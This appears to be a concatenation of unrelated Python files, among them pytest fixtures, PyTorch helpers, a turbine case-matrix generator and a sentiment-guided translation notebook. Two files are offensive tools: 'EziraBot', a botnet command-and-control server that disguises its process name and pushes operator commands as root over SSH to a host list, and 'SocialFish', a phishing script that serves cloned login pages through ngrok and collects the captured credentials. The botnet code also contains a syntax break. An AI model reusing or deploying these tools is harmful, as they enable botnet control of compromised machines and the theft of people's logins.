return models.Circuit.objects.create(
endpoint_a=interface_a,
endpoint_z=interface_z
)
@pytest.fixture
def looped_circuit(self, device, interface_a):
interface_z = models.Interface.objects.create(
device=device,
name='eth1'
)
return models.Circuit.objects.create(
endpoint_a=interface_a,
endpoint_z=interface_z,
)
def test_normal_conditions(self, device, device_z, interface_a,
interface_z, normal_circuit):
assert normal_circuit.interface_for(device) == interface_a
print('interface_z via circuit id = {}'.format(normal_circuit.endpoint_z.id))
print('interface_z id = {}'.format(interface_z.id))
assert normal_circuit.interface_for(device_z) == interface_z
def test_single_sided(self, device, interface_a):
"""
Make sure things don't blow up on a single-sided circuit
"""
circuit = models.Circuit.objects.create(endpoint_a=interface_a)
assert circuit.interface_for(device) == interface_a
def test_looped_circuit(self, device, looped_circuit, interface_a):
"""
Test the case when both sides of a circuit are connected to the same
device. The method should return endpoint_a in this case.
"""
assert looped_circuit.interface_for(device) == interface_a
def test_bogus_device(self, device, device_z, looped_circuit):
"""
interface_for should return None when given a device that isn't
connected by the circuit
"""
assert looped_circuit.interface_for(device_z) is None
assert looped_circuit.interface_for(device) is not None
|
py | 1a4a1a131cd3946c590b81c527b26b2aaddffb02 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Misc Libs
import time
import random
from datetime import datetime
# Character Libs
import string
import hashlib
import binascii
# System Libs
import os
import sys
import itertools
import subprocess
import ctypes
import threading
# Network Libs
from pssh.pssh2_client import ParallelSSHClient
import socket
import MySQLdb
import requests
class puts:
@staticmethod
def run(cmd):
subprocess.call(cmd, shell=True)
@staticmethod
def err(string):
sys.stderr.write(string + "\n")
@staticmethod
def out(string):
sys.stdout.write(string + "\n")
# Variables
max_threads = 50
states = ['telnet', 'ntpq', 'ntpdc', 'apache2']
thread_ids = []
syntax_prefix = "/"
tcp_allow = True
__tcpname__ = "\033[46m\033[30m[ezira_tcp]\033[0m"
__obfname__ = "\033[101m\033[30m[ezira_obf]\033[0m"
__cltname__ = "\033[45m\033[30m[ezira_client]\033[0m"
__sysname__ = "\033[100m\033[30m[ezira_sys]\033[0m"
__tskname__ = "\033[104m\033[30m[ezira_task]\033[0m"
def check_for_package():
global states
select_pack = (random.choice(states))
result = os.path.isfile("/usr/bin/%s" % (select_pack))
if (result):
puts.out(__obfname__ + " package: %s found. using as spoofed process name." % (select_pack))
processname = select_pack
libc = ctypes.cdll.LoadLibrary('libc.so.6')
libc.prctl(15, processname, 0, 0, 0)
Server()
elif (not result):
puts.out(__obfname__ + " package: %s is not installed. attempting new package." % (select_pack))
check_for_package()
def GetClientThread():
char = ''.join(random.choice(string.digits) for x in range(6))
fin_char = "0x" + char
return fin_char
def GetBanner(conn):
clist = ["\033[31m", "\033[32m", "\033[33m", "\033[34m", "\033[35m"]
is_banner_a_file = os.path.isfile("/var/log/ezira/banner.txt")
if (is_banner_a_file == True):
file = open("/var/log/ezira/banner.txt")
for line in file:
dcol = random.choice(clist)
line = line.strip("\r\n")
conn.send(dcol + line + "\r\n")
elif (is_banner_a_file == False):
pass
def client(gct, conn, addr):
conn.send("\033]0;EziraBot\007")
global thread_ids
global usernames_active
global devices_av
global install
admin = False
banned = False
premium = False
isValidAccount = False
isSession1 = False
hosts = []
db = MySQLdb.connect(host="localhost", user="root", passwd="", db="ezira")
cur = db.cursor()
try:
file = open("/var/log/ezira/ssh_servers.txt", "r")
for line in file:
hosts.append(line.strip("\r\n"))
conn.send("executing 'login' from task: mmaster_cnc_scmd\r\n")
puts.out(__cltname__ + " prompting client with login")
conn.send("\033[1m\033[30m\033[107mlogin:\033[0m ")
username = conn.recv(1024).strip("\r\n")
conn.send("\033[1m\033[30m\033[107mpassword:\033[0m ")
password = conn.recv(1024).strip("\r\n")
puts.out(__cltname__ + " client sent login [%s:%s]" % (username, password))
cur.execute("SELECT * FROM `users` WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
row = cur.fetchall()
if (row):
isValidAccount = True
if (row[0][3] == 1):
admin = True
if (row[0][4] == 1):
banned = True
if (row[0][5] == 1):
premium = True
if (row[0][6] == 1):
isSession1 = True
elif (not row):
isValidAccount = False
if (isValidAccount == True and banned == False and isSession1 == False):
conn.send("\033]0;EziraBot | Username - %s | Administrator - %s | Conns - %s\007" % (username, admin, len(hosts)))
cur.execute("UPDATE `users` SET session=1 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
conn.send("\033[2J\033[1;1H")
GetBanner(conn)
try:
while True:
conn.send("\033[0m%s@ezira $ " % (username))
try:
oCmd = conn.recv(512)
blank = conn.recv(512)
nCmd = oCmd.split(' ')
elif (nCmd[0] == syntax_prefix+"threads"):
conn.send("[%d/%d] threads used\r\n" % (len(thread_ids), max_threads))
elif (nCmd[0] == syntax_prefix+"logout"):
conn.close()
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
elif (nCmd[0] == syntax_prefix+"clear"):
conn.send("\033[2J\033[1;1H")
elif (nCmd[0] == syntax_prefix+"net_info"):
try:
if (nCmd[1] == "ip-domain"):
host = nCmd[2]
result = socket.gethostbyname(str(host))
conn.send(result + "\r\n")
elif (nCmd[1] == "getfqdn"):
host = nCmd[2]
result = socket.getfqdn(str(host))
conn.send(result + "\r\n")
except socket.gaierror as e:
conn.send(__tskname__ + " task '%s': failed to resolve hostname '%s'\r\n" % (nCmd[0],host))
elif (nCmd[0] == syntax_prefix+"adduser"):
if (admin):
cur.execute("INSERT INTO `users` VALUES (NULL, \"%s\", \"%s\", 0, 0, 0, 0)" % (nCmd[1], nCmd[2]))
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"banuser"):
if (admin):
cur.execute("UPDATE `users` SET banned=1 WHERE username=\"%s\"" % (nCmd[1]))
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"shutdown"):
if (admin):
sys.exit("[ezira_sys] shutting down... (0)")
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"exec"):
if (nCmd[1] == "sys"):
conn.send("command: ")
cmdInput = conn.recv(1024)
conn.send("executing 'sys' to hosts...\r\n")
ssh_h_client = ParallelSSHClient(hosts, user="root", password="SET_PASSWORD", port=22, timeout=10)
output = ssh_h_client.run_command(cmdInput)
for host in output:
puts.out(__tskname__ + " task '%s': executed on %s | exit code: '%s'" % (nCmd[1], host, output[host].exit_code))
elif (nCmd[0] == syntax_prefix+"enable"):
if (nCmd[1] == "telnet"):
if (nCmd[2] == "honeypot"):
pass
elif (nCmd[1] == "ssh"):
if (nCmd[2] == "honeypot"):
pass
except Exception as e:
conn.send("Invalid Syntax\r\n")
puts.out(str(e))
except Exception:
puts.out(__cltname__ + " user {}:{} has disconnected with id {}".format(addr[0], addr[1], gct))
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
thread_ids.remove(gct)
if (conn):
conn.close()
elif (isValidAccount == False):
puts.out(__cltname__ + " %s:%s tried logging in with a non-existant account %s:%s" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
elif (isSession1 == True):
puts.out(__cltname__ + " user has tried logging in twice, killing connection. [%s:%s - %s:%s]" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
elif (isValidAccount == True and banned == True):
puts.out(__cltname__ + " %s:%s tried logging into a banned account %s:%s" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
except Exception as e:
puts.out(__cltname__ + " user {}:{} has disconnected with id {}".format(addr[0], addr[1], gct))
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
try:
thread_ids.remove(gct)
except ValueError:
pass
if (conn):
conn.close()
def Server():
sock = socket.socket()
try:
sock.bind(("0.0.0.0", int(sys.argv[1])))
except socket.error:
puts.err(__tcpname__ + " address already in use")
puts.out(__tcpname__ + " socket is now listening on %d" % (int(sys.argv[1])))
sock.listen(0)
puts.out("------------------------------------")
try:
if (tcp_allow):
while True:
conn, addr = sock.accept()
puts.out(__tcpname__ + " new connection from {}:{}".format(addr[0], addr[1]))
gct = GetClientThread()
thread_ids.append(gct)
puts.out(__tcpname__ + " client assigned thread {}".format(gct))
try:
if (len(thread_ids) != max_threads):
gct_run = threading.Thread(target=client, args=(gct, conn, addr,)).start()
else:
puts.out(__tcpname__ + "max threads used. disconnecting client.")
except threading.ThreadError:
puts.out(__tcpname__ + " failed to start thread with id {}".format(gct))
except:
puts.out(__tcpname__ + " unknown thread error returning id {}".format(gct))
elif (not tcp_allow):
sys.exit(__tcpname__ + " tcp_allow var set to False")
except socket.error as e:
puts.out(__tcpname__ + " unexpected error.")
puts.out(str(e))
Server()
|
py | 1a4a1aeef0ee818a0838313146ab0fcc394d0b36 | from IpToCountry.ip_to_country import IpToCountry
class Test_IpToCountry:
def testParser(self):
ip_to_country = IpToCountry()
assert \
ip_to_country._config['api']['url'] ==\
'http://api.ipstack.com/'
assert \
ip_to_country._config['api']['key'] ==\
'API_KEY'
assert \
ip_to_country._config['local']['database_file'] ==\
r'..\resources\test_db'
|
py | 1a4a1b422f18777ca3ee09ca0d3fee02036068ed | # -*- coding: utf-8 -*-
#
# Developed by Alex Jercan <[email protected]>
#
# References:
#
import os
import torch
def tensors_to_device(tensors, device):
return (tensor.to(device, non_blocking=True) for tensor in tensors)
def init_weights(m):
if type(m) == torch.nn.Conv2d or type(m) == torch.nn.Conv3d or \
type(m) == torch.nn.ConvTranspose2d or type(m) == torch.nn.ConvTranspose3d:
torch.nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.BatchNorm3d:
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif type(m) == torch.nn.Linear:
torch.nn.init.normal_(m.weight, 0, 0.01)
torch.nn.init.constant_(m.bias, 0)
def set_parameter_requires_grad(model):
for param in model.parameters():
param.requires_grad = False
def load_checkpoint(model, checkpoint_file, device):
checkpoint = torch.load(checkpoint_file, map_location=device)
init_epoch = checkpoint['epoch_idx'] + 1
model.load_state_dict(checkpoint['state_dict'])
return init_epoch, model
def save_checkpoint(epoch_idx, model, dir_checkpoints):
file_name = 'checkpoint-epoch-%03d.pth' % (epoch_idx)
output_path = os.path.join(dir_checkpoints, file_name)
if not os.path.exists(dir_checkpoints):
os.makedirs(dir_checkpoints)
checkpoint = {
'epoch_idx': epoch_idx,
'state_dict': model.state_dict(),
}
torch.save(checkpoint, output_path) |
py | 1a4a1c560fb07b47d45ba82629b0a971689a27bd | ######################################################
# #
# SOCIALFISH v2.0 #
# #
# by: vaon4ik #
# #
# Telegram Group: https://t.me/joinchat/PMg-a1UcFlsyE___0SuKiQ #
#
# #
# #
######################################################
from contextlib import contextmanager
import json
import multiprocessing
import requests
import os
from time import sleep
from huepy import *
import subprocess
from core.email import send_mail
from core.credentials import credentials
from smtplib import SMTPSenderRefused, SMTPServerDisconnected
from time import strftime
def runPhishing(social, custom):
global _social
_social = social
os.system('rm -Rf base/Server/www/*.* && touch base/Server/www/cat.txt')
command = 'cp base/WebPages/%s/*.* base/Server/www/' % social.lower()
os.system(command)
with open('base/Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUST0M>', custom)
f = open('base/Server/www/login.php', 'w')
f.write(c)
f.close()
def waitCreds():
print(cyan(" [*] Waiting for credentials... "))
while True:
with open('base/Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print(green('\n [*] Credentials found:\n %s' % lines))
os.system('rm -rf base/Server/www/cat.txt && touch base/Server/www/cat.txt')
try:
credentials(lines.split('\n'), _social)
send_mail(lines.split('\n'),_social)
except NameError:
pass
except SMTPSenderRefused:
print(red(' [!] Sorry, sender refused :('))
pass
except SMTPServerDisconnected:
pass
@contextmanager
def runServer(port: int):
def php_process():
os.system("cd base/Server/www/ && php -n -S 127.0.0.1:%d > /dev/null 2>&1 &" % port)
php_process = multiprocessing.Process(target=php_process)
php_process.start()
yield php_process
php_process.terminate()
php_process.close()
@contextmanager
def ngrok_start(port: int):
ngrok_process = subprocess.Popen(
['./base/Server/ngrok','http','%s' % port],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
while True:
try:
ngrok_url = requests.get('http://127.0.0.1:4040/api/tunnels/command_line')
if ngrok_url.status_code == 200:
public_url = json.loads(ngrok_url.text)['public_url']
print(green(' [~] Ready to Phishing'))
print(lightgreen(' [*] Ngrok URL: %s' % public_url))
print(green(' [~] Your logs are being stored in: Logs/{}').format(_social + strftime('-%y%m%d.txt')))
print(yellow(' [^] Press Ctrl+C or VolDown+C(android) to quit'))
yield public_url
break
except requests.exceptions.ConnectionError:
sleep(.5)
os.kill(ngrok_process.pid, 15)
def PhishingServer(port: int=1449):
with ngrok_start(port) as ngrok:
with runServer(port) as php:
waitCreds()
|
py | 1a4a1d5376e4385ddc8c3f25298434ed86244ec6 | import os, itertools
import numpy as np
from ofTools.util.FileTools import save_yaml
def save_case_matrix_direct(case_list, dir_matrix):
### assumes all elements of the list are dict for that case that has the same keys!
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
ofh = open(os.path.join(dir_matrix,'case_matrix.txt'),'w')
case = case_list[0]
for key in case.keys():
k = key[0]
ofh.write("%s " % k)
ofh.write("\n")
for key in case.keys():
k = key[1]
ofh.write("%s " % k)
ofh.write("\n")
for i in range(len(case_list)):
case = case_list[i]
for key in case.keys():
ofh.write(str(case[key]))
ofh.write(" ")
ofh.write("\n")
ofh.close()
def save_case_matrix(matrix_out, change_vars, dir_matrix):
# save matrix file
if type(change_vars[0]) is tuple:
n_header_lines = len(change_vars[0])
else:
change_vars = [(var,) for var in change_vars]
n_header_lines = 1
n_cases = np.shape(matrix_out)[0]
matrix_out = np.hstack((np.asarray([[i] for i in range(n_cases)]), matrix_out))
change_vars = [('Case_ID',)+('',)*(n_header_lines-1)] + change_vars
# col_len = [max([len(val) for val in matrix_out[:,j]] + [len(change_vars[j][0]), len(change_vars[j][1])]) for j in range(len(change_vars))]
col_len = [max([len(str(val)) for val in matrix_out[:,j]] + [len(change_vars[j][header_i]) for header_i in range(n_header_lines)]) for j in range(len(change_vars))]
text_out = []
for header_i in range(n_header_lines):
text_out.append(''.join([val.center(col+2) for val, col in zip([var[header_i] for var in change_vars], col_len)])+'\n')
for row in matrix_out:
row_str = ''
for val, col in zip(row, col_len):
if val is not str:
val = str(val)
row_str += val.center(col+2)
row_str += '\n'
text_out.append(row_str)
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
ofh = open(os.path.join(dir_matrix,'case_matrix.txt'),'w')
for row in text_out:
ofh.write(row)
ofh.close()
def save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_names):
matrix_out_yaml = {}
for var in change_vars:
matrix_out_yaml[var] = []
matrix_out_yaml['Case_ID'] = []
matrix_out_yaml['Case_Name'] = []
for i, row in enumerate(matrix_out):
matrix_out_yaml['Case_ID'].append(i)
matrix_out_yaml['Case_Name'].append(case_names[i])
for val, var in zip(row, change_vars):
if type(val) is list:
if len(val) == 1:
val = val[0]
if type(val) in [np.float32, np.float64, np.single, np.double, np.longdouble]:
val = float(val)
elif type(val) in [np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32, np.uint64, np.intc, np.uintc, np.uint]:
val = int(val)
elif type(val) in [np.array, np.ndarray]:
val = val.tolist()
elif type(val) in [np.str_]:
val = str(val)
# elif len(val) > 0:
# val = val.tolist()
matrix_out_yaml[var].append(val)
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
save_yaml(dir_matrix, 'case_matrix.yaml', matrix_out_yaml)
def case_naming(n_cases, namebase=None):
# case naming
case_name = [('%d'%i).zfill(len('%d'%(n_cases-1))) for i in range(n_cases)]
if namebase:
case_name = [namebase+'_'+caseid for caseid in case_name]
return case_name
def convert_str(val):
def try_type(val, data_type):
try:
data_type(val)
return True
except:
return False
# return isinstance(val, data_type) ### this doesn't work b/c of numpy data types; they're not instances of base types
def try_list(val):
try:
val[0]
return True
except:
return False
if try_type(val, int) and int(val) == float(val):
return int(val)
elif try_type(val, float):
return float(val)
elif val=='True':
return True
elif val=='False':
return False
# elif type(val)!=str and try_list(val):
# return ", ".join(['{:}'.format(i) for i in val])
else:
return val
def CaseGen_General(case_inputs, dir_matrix='', namebase='', save_matrix=True):
""" Cartesian product to enumerate over all combinations of set of variables that are changed together"""
# put case dict into lists
change_vars = sorted(case_inputs.keys())
change_vals = [case_inputs[var]['vals'] for var in change_vars]
change_group = [case_inputs[var]['group'] for var in change_vars]
# find number of groups and length of groups
group_set = list(set(change_group))
group_len = [len(change_vals[change_group.index(i)]) for i in group_set]
# case matrix, as indices
group_idx = [range(n) for n in group_len]
matrix_idx = list(itertools.product(*group_idx))
# index of each group
matrix_group_idx = [np.where([group_i == group_j for group_j in change_group])[0].tolist() for group_i in group_set]
# build final matrix of variable values
matrix_out = []
for i, row in enumerate(matrix_idx):
row_out = [None]*len(change_vars)
for j, val in enumerate(row):
for g in matrix_group_idx[j]:
row_out[g] = change_vals[g][val]
matrix_out.append(row_out)
try:
matrix_out = np.asarray(matrix_out, dtype=str)
except:
matrix_out = np.asarray(matrix_out)
n_cases = np.shape(matrix_out)[0]
# case naming
case_name = case_naming(n_cases, namebase=namebase)
# Save case matrix
if save_matrix:
if not dir_matrix:
dir_matrix = os.getcwd()
try:
save_case_matrix(matrix_out, change_vars, dir_matrix)
save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_name)
except:
save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_name)
case_list = []
for i in range(n_cases):
case_list_i = {}
for j, var in enumerate(change_vars):
case_list_i[var] = convert_str(matrix_out[i,j])
case_list.append(case_list_i)
return case_list, case_name
if __name__ == "__main__":
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[10.], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[8., 9., 10., 11., 12.], 'group':1}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[9.156, 10.296, 11.431, 11.89, 12.1], 'group':1}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[0., 0., 0., 0., 3.823], 'group':1}
case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True','False'], 'group':2}
case_list, case_name = CaseGen_General(case_inputs, 'C:/Users/egaertne/WISDEM/AeroelasticSE/src/AeroelasticSE/', 'testing')
|
py | 1a4a1dcca2941cb9cd9a11655b13374007d942c6 | #
# Credit for the open-source translation models used in this notebook goes to the members of the
# OPUS-MT and Helsinki-NLP teams, as well as contributors to Microsoft's Marian-NMT, in partciular
# Jörg Tiedemann at the University of Helsinki and Marcin Junczys-Dowmunt at Microsoft Translation
#
# Inspiration for the sentiment models used in this notebook comes from Chris McCormick and
# Nick Ryan's BERT fine-tuning tutorial, located here: https://mccormickml.com/2019/07/22/BERT-fine-tuning/
#
# Our main contribution as the authors of this notebook and members of the associated project (anonymized
# for purposes of peer-review) is in incorporating the sentiment models described above (BERT/XLM-RoBERTa) directly
# into the process of selecting translation candidates generated by beam search, supported by the open-source
# translation models also described above
#
# Some comments——such as those giving credit to the contributors listed above——may not be our own, and
# should be credited to Chris McCormick, Nick Ryan, and various members of the OPUS-MT, Helsinki-NLP, and
# Marian-NMT teams
###########################################################################################################
# -*- coding: utf-8 -*-
"""MarianMT en-ROMANCE Model with sentiment-based modification
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1EBQTIVCwTXP7bBOjm0493pkGu_1FcNln
"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# !pip install transformers --upgrade
# !pip install mosestokenizer
"""### Translating with Transformers
Thanks to everyone who helped with this, especially:
* [Jörg Tiedemann](https://researchportal.helsinki.fi/en/persons/j%C3%B6rg-tiedemann) from the [OPUS project](http://opus.nlpl.eu/)
* [Marcin Junczys-Dowmunt](https://twitter.com/marian_nmt) from Microsoft's [Marian NMT](https://t.co/IuL994N6nQ?amp=1) library
"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# from transformers import MarianMTModel, MarianTokenizer
# src_text = [
# '>>fr<< This is a sentence in english that we want to translate to french.',
# '>>pt<< This should go to portuguese.',
# '>>es<< And this to Spanish.'
# ]
#
# model_name = 'Helsinki-NLP/opus-mt-en-ROMANCE'
# tokenizer = MarianTokenizer.from_pretrained(model_name)
# # see tokenizer.supported_language_codes for choices
# model = MarianMTModel.from_pretrained(model_name)
#@title Translate with Transformers
english_text = "Time Warner Road Runner customer support here absolutely blows." #@param {type:"string"}
tgt_language = "es" #@param ["fr", "es", "it", "pt", "pt_br", "ro", "ca", "gl", "pt_BR", "la", "wa", "fur", "oc", "fr_CA", "sc", "es_ES", "es_MX", "es_AR", "es_PR", "es_UY", "es_CL", "es_CO", "es_CR", "es_GT", "es_HN", "es_NI", "es_PA", "es_PE", "es_VE", "es_DO", "es_EC", "es_SV", "an", "pt_PT", "frp", "lad", "vec", "fr_FR", "co", "it_IT", "lld", "lij", "lmo", "nap", "rm", "scn", "mwl"] {allow-input: true}
src_txt = f'>>{tgt_language}<< {english_text}'
translated = model.generate(**tokenizer.prepare_translation_batch([src_txt]), num_beams=10, num_return_sequences=10)
print([tokenizer.decode(t, skip_special_tokens=True) for t in translated])
import torch
from google.colab import drive
drive.mount("/content/drive")
!pip install transformers
from transformers import BertForSequenceClassification
english_sentiment_model = BertForSequenceClassification.from_pretrained(
"bert-base-uncased", # Use the 12-layer BERT model, with an uncased vocab.
num_labels = 2, # The number of output labels--2 for binary classification.
# You can increase this for multi-class tasks.
output_attentions = False, # Whether the model returns attentions weights.
output_hidden_states = False # Whether the model returns all hidden-states.
)
from transformers import XLMRobertaForSequenceClassification, AdamW, BertConfig
# Load BertForSequenceClassification, the pretrained BERT model with a single
# linear classification layer on top.
spanish_sentiment_model = XLMRobertaForSequenceClassification.from_pretrained(
"xlm-roberta-large", # Use the large XLM Roberta model.
num_labels = 2, # The number of output labels--2 for binary classification, 3 for ternary, etc.
# You can increase this for multi-class tasks.
output_attentions = False, # Whether the model returns attentions weights.
output_hidden_states = False, # Whether the model returns all hidden-states.
)
english_sentiment_model.load_state_dict(torch.load("/content/drive/My Drive/Summer Project 2020/English_sentiment_model.pt", map_location=torch.device('cpu')))
english_sentiment_model.eval()
spanish_sentiment_model.load_state_dict(torch.load("/content/drive/My Drive/Summer Project 2020/Spanish_sentiment_model.pt", map_location=torch.device('cpu')))
spanish_sentiment_model.eval()
from transformers import BertTokenizer, XLMRobertaTokenizer
from torch.utils.data import TensorDataset, DataLoader
import numpy as np
import re
from bs4 import BeautifulSoup
# gets the tweet into the format we want
def clean_tweet(tweet):
tweet = BeautifulSoup(tweet, "lxml").get_text() # turns xml-formatted text into regular text
tweet = re.sub(r"@[A-Za-z0-9]+", " ", tweet) # gets rid of all user references in tweets (i.e. "@username")
tweet = re.sub(r"https?://[A-Za-z0-9./]+", " ", tweet) # gets rid of URLs
tweet = re.sub(r"[^A-Za-z.!?áéíóúüñ¿ÁÉÍÓÚÜÑ']", " ", tweet) # gets rid of any non-standard characters in the tweets
tweet = re.sub(r" +", " ", tweet) # replaces all excess whitespace with a single space
return tweet # gives us our cleaned tweet
english_sentiment_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)
spanish_sentiment_tokenizer = XLMRobertaTokenizer.from_pretrained('xlm-roberta-large', do_lower_case=True)
device = torch.device('cpu')
def predict_sentiment(tweet, language):
if language == "english":
sentiment_model = english_sentiment_model
sentiment_tokenizer = english_sentiment_tokenizer
if language == "spanish":
sentiment_tokenizer = spanish_sentiment_tokenizer
sentiment_model = spanish_sentiment_model
tweet = clean_tweet(tweet)
tweet_input_id = []
tweet_attention_mask = []
tweet_dict = sentiment_tokenizer.encode_plus(
tweet, # Sentence to encode.
add_special_tokens = True, # Add '[CLS]' and '[SEP]'
max_length = 64, # Pad & truncate all sentences.
truncation=True, # Explicitly enable truncation
pad_to_max_length = True,
return_attention_mask = True, # Construct attn. masks.
return_tensors = 'pt', # Return pytorch tensors.
)
# Add the encoded sentence to the list.
tweet_input_id.append(tweet_dict['input_ids'])
# And its attention mask (simply differentiates padding from non-padding).
tweet_attention_mask.append(tweet_dict['attention_mask'])
# Convert the lists into tensors.
tweet_input_id = torch.cat(tweet_input_id, dim=0)
tweet_attention_mask = torch.cat(tweet_attention_mask, dim=0)
tweet_data = TensorDataset(tweet_input_id, tweet_attention_mask)
tweet_dataloader = DataLoader(tweet_data)
for data in tweet_dataloader:
tweet_input_id = data[0].to(device)
tweet_attention_mask = data[1].to(device)
tweet_logits = sentiment_model(tweet_input_id, token_type_ids=None, attention_mask=tweet_attention_mask)
tweet_logits = tweet_logits[0].detach().cpu().numpy()
tweet_logits = torch.Tensor(tweet_logits)
softmax = torch.nn.Softmax(dim=1)
prob_dist = softmax(tweet_logits)
sentiment_pred = prob_dist.tolist()
sentiment_pred = sentiment_pred[0][1]
return sentiment_pred
print(predict_sentiment("This is the best day ever!", "english"))
print(predict_sentiment("Este es el peor dia de mi vida", "spanish"))
# OUR NOVEL CONTRIBUTION TO THE NMT CANDIDATE SELECTION PROCESS:
# Select, from the top num_candidates translations, the translation
# which minimizes the absolute difference between the translation's sentiment
# and that of the source text
def TranslateWithSentimentSelection(sentence, num_candidates):
source_sentence = f'>>{"es"}<< {sentence}'
translated = model.generate(**tokenizer.prepare_translation_batch([source_sentence]), num_beams=num_candidates, num_return_sequences=num_candidates)
candidate_translations = [tokenizer.decode(t, skip_special_tokens=True) for t in translated]
source_sentiment = predict_sentiment(sentence, "english")
target_sentiments = [predict_sentiment(candidate, "spanish") for candidate in candidate_translations]
sentiment_divergence_list = []
for i in range(len(target_sentiments)):
sentiment_divergence_list.append(abs(target_sentiments[i] - source_sentiment))
translation = candidate_translations[sentiment_divergence_list.index(min(sentiment_divergence_list))]
return translation
# FOR GENERATING THE BASELINE TRANSLATION, I.E. BEST CANDIDATE AS DETERMINED BY
# BEAM SEARCH
def TranslateBaseline(sentence):
source_sentence = f'>>{"es"}<< {sentence}'
translated = model.generate(**tokenizer.prepare_translation_batch([source_sentence]))
translation = ([tokenizer.decode(t, skip_special_tokens=True) for t in translated])[0]
return translation
# Testing our modified model against the baseline
example_sentence_1 = "Time Warner Road Runner customer support here absolutely blows."
print("English sentence 1:", example_sentence_1)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_1))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_1, 10))
print(" ")
print(" ")
example_sentence_2 = "Okay, first assessment of the Kindle . . . it fucking rocks!"
print("English sentence 2:", example_sentence_2)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_2))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_2, 10))
print(" ")
print(" ")
example_sentence_3 = "Could Time Warner Cable suck more?"
print("English sentence 3:", example_sentence_3)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_3))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_3, 10))
example_sentence_4 = "LeBron is a monsta and he is only 24. SMH The world ain't ready."
print("English sentence 4:", example_sentence_4)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_4))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_4, 10))
print(" ")
print(" ")
example_sentence_5 = "I know my life has been flipped upside down when I just thought in my head that some Ramen sounds good. "
print("English sentence 5:", example_sentence_5)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_5))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_5, 10))
print(" ")
print(" ")
example_sentence_6 = "I'm sorry—I'm feeling kinda yucky myself—5am is going to come too quick."
print("English sentence 6:", example_sentence_6)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_6))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_6, 10))
print(" ")
print(" ")
example_sentence_7 = "I need a new boyfriend... I'm stuck in a rut"
print("English sentence 7:", example_sentence_7)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_7))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_7, 10))
print(" ")
print(" ")
example_sentence_8 = "aww that stinks!"
print("English sentence 8:", example_sentence_8)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_8))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_8, 10))
print(" ")
print(" ")
example_sentence_9 = "I'm tired. I feel like crap. And the world feels all crummy. Make me happy, USB disco mouse. "
print("English sentence 9:", example_sentence_9)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_9))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_9, 10))
print(" ")
print(" ")
example_sentence_10 = "why are people such wankers these days?"
print("English sentence 10:", example_sentence_10)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_10))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_10, 10))
print(" ")
print(" ")
example_sentence_11 = "@Holidaybot is rubbish! . . ."
